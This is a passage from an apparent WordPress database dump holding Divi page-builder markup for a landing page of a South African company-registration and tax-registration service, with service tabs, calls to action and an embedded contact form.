max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" background__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#ffffff\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><span>All companies (including external companies) and close corporations are required by law to file their annual returns with the CIPC on an annual basis, within a prescribed time period. The purpose for the filing of such annual returns is to confirm whether a company or close corporation is still in business/trading, or if it will be in business in the near future.</span></p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p>Any person that carries on a business may register for VAT. The term person is not only limited to companies but also includes, amongst others, individuals, partnerships, trust funds, foreign donor funded projects and municipalities.</p>\n<p>It is<span> </span><span>mandatory</span><span> </span>for a person to register for VAT if sales made from selling goods or services is in excess of R1 million in any consecutive twelve month period.</p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Combo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/combo-deals-2\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><b>Each Company Is Unique In Its Own Right</b></p>\n<p><b></b></p>\n<p>Customize your package and save <span style=\"color: #ff00ff;\">BIG</span></p>[/et_pb_toggle][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"2_3,1_3\" _builder_version=\"3.26.6\" width=\"89%\" max_width=\"1490px\" module_alignment=\"center\" custom_margin=\"|217px||221px||\"][et_pb_column type=\"2_3\" _builder_version=\"3.26.6\"][et_pb_shop type=\"product_category\" posts_number=\"6\" include_categories=\"8,7,17\" columns_number=\"3\" _builder_version=\"3.26.6\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-03-1.png\" _builder_version=\"3.26.6\" width=\"100%\" max_width=\"103%\" module_alignment=\"center\" height=\"568px\" custom_padding=\"||11px|||\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-19 09:27:37','2019-08-19 07:27:37','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32975,3,'2019-08-19 09:25:24','2019-08-19 07:25:24','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" background__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#ffffff\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" 